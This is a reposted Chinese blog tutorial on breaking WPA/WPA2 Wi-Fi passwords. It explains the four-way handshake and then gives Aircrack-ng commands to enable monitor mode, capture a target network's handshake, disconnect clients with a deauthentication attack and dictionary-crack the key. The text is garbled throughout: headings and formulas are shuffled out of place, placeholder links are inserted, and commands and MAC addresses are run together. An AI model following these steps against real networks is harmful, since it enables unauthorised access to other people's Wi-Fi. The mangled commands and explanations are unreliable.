首页 > 编程知识 正文

无线网络wifi,wpa2的wifi可以破解吗

时间:2023-05-06 05:53:51 阅读:117716 作者:1945

声明:本文仅供学习交流使用!

wifi 标准以及相应标准的特征汇总表

http://www.Sina.com/http://www.Sina.com /

最古老的无线加密方案容易被算法的缺陷解密。 数据包获取数据流中明文传输的IV,通过统计学方法在IV上获得密钥。

无线安全技术

WAP使用临时密钥集成协议(TKIP )实现WLAN的访问控制、密钥管理和数据加密,而无需升级硬件,从而提高WEP的安全性WPA加密算法有两个版本。 http://www.Sina.com/http://www.Sina.com /

1) WEP(Wired Equivalent Privacy有线对等保密)

802.1x EAP、预共享密钥:身份验证算法

TKIP、AES :数据传输加密算法

MIC、CCMP :数据完整性检查算法

802.1x EAP (在工业级、安全要求高的地方使用。 需要认证服务器(EAP扩展认证协议是一种体系结构,而不是具体算法。 常见的有LEAP、MD5、TTLS、TLS、PEAP、SRP、SIM、AKA中的TLS和TTLS为双向认证模式。 这种认证方式不怕网络劫持和词典攻击。

预共享密钥(家用,用于安全要求低的地方。 不需要服务器)。 容易被词典攻击

http://www.Sina.com/http://www.Sina.com /

WPA握手基于802.1X协议,使用eapol key进行封装传输。2) WPA

使用SSID和passphares作为条目,通过散列算法生成PSK。 在WPA-PSK上为a) WPA = 802.1x + EAP + TKIP + MIC = Pre-shared Key + TKIP + MIC

b) WPA2 = 802.1x + EAP + AES + CCMP = Pre-shared Key + AES + CCMP

AP广播SSID,AP_MAC(aa;

站端使用接收到的SSID,AP_MAC和passphares使用相同的算法生成PSK。

注:

STATION向AP发送随机数SNonce,station_MAC(sa );

AP端接收SNonce、station_MAC(sa )生成随机数ANonce,用PMK、AP_MAC ) aa、station_MAC(sa )、SNonce、ANonce生成以下sha1_

WPA-PSK

AP将上面生成的ANonce发送到站

站端使用与ANonce的接收和以前生成PMK、SNonce、AP_MAC(aa )、station_MAC ) sa的相同的算法生成PTK。 提取该PTK的前16个字节构成MIC KEY,使用以下算法生成MIC KEY值,使用该MIC KEY和802.1X数据帧使用以下算法生成MIC值1) WPA的四次握手过程

a) AP初始化:

站发送802.1X数据帧,MIC发送AP; 站端用上面准备的802.1X数据帧最后填充MIC值和2字节的0 (十六进制),然后将此数据帧发送到AP。

AP端接收该数据帧并提取该MIC。 然后,用0 (十六进制)填充此数据帧的所有MIC部分。 此时,使用此802.1X数据帧,使用与上面的AP生成的mic密钥相同的算法输出mic’。 如果mic’等于STATION发来的mic。 那么第四次握手成功了。 不等待说明,AP和站的钥匙不同,握手失败。

PSK=PMK=pdkdf2_SHA1(passphrase, SSID, SSID length, 4096)

使用我们词典中的Passphrase SSID成为PMK,然后结合紧握的包中的STA_MAC、AP_MAC、ANONCE、SNONCE计算PTK,再加入原始消息数据,将MIC

b) 第一次握手:

环境: Kali Linux 2.0、USB无线网卡

工具: Aircrack-ng

33558 www.Sina.com/:将USB卡插入虚拟机,并将网卡置于侦听模式。 命令如下:

Airmon-ngstartra0(ra0是无线网卡名称) ) )。

如果c) 第二次握手虚拟机无法检测到无线网卡,则必须安装驱动程序。 教程链接: http://blog.csdn.net/swjtu 100/article/details/50543260

PTK=SHA1_PRF(PMK, Len(PMK), “Pairwise key expansion”, MIN(AA, SA) || Max(AA, SA) || Min(ANonce, SNonce) || Max(ANonce, SNonce)):抓取数据包查看所在地区无线网络的状态,选择要解密的网络,命令如下:

airodump-ng ra0

d) 第三次握手::抓住目标网络握力包,命令:

airodump-ng-C1BSS IDEC :1733602 f : fa : f 0: ca-w/root/desktop/ra0

参数说明:-c :监听通道-bssid目标AP网络mac值-w :存储监听事件的文件名

33558 www.Sina.com/:重新打开terminal窗口,断开并重新连接使用DEAUTH攻击连接的客户端,创建握力包。 (注意:要握住并解密包,需要合法的客户端)命令包括:

aireplay-ng-010-AEC :1733602 f : fa : f 03360 ca-CDC : ee :0633601 f : bb : afra 0

参数说明:- 0 deauth攻击10 :进行10次攻击-a:AP的MAC地址-c :连接到该AP的客户端MAC地址

握住包后会显示红框内的信息

MIC = HMAC_MD5(MIC Key,16,802.1X data):通过掌握4次手册和词典(metasploit附带的词典)来解密密码,命令如下。

aircrack-ng-a2-bec :1733602 f : fa : f 03360 ca-w/usr/share/metasploit-framework/data/John /

word lists/password.lst/root/desktop/- 01.cap

参数说明:-a2 WPA方法手握包-w :词典路径-01.cap :解读步骤4中抓取的手握包文件名

解读成功!

参考:

3358 www.freebuf.com/articles/wireless/58342.html

3358 blog.csdn.net/Ivan _/article/details/39205371

3358 null-byte.wonder how to.com/how-to/wi-fi-hacking /

3358 lewiscomputerhowto.blogspot.in/2014/06/how-to-hack-wpa wpa2- wi-fi-with-kali.html

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。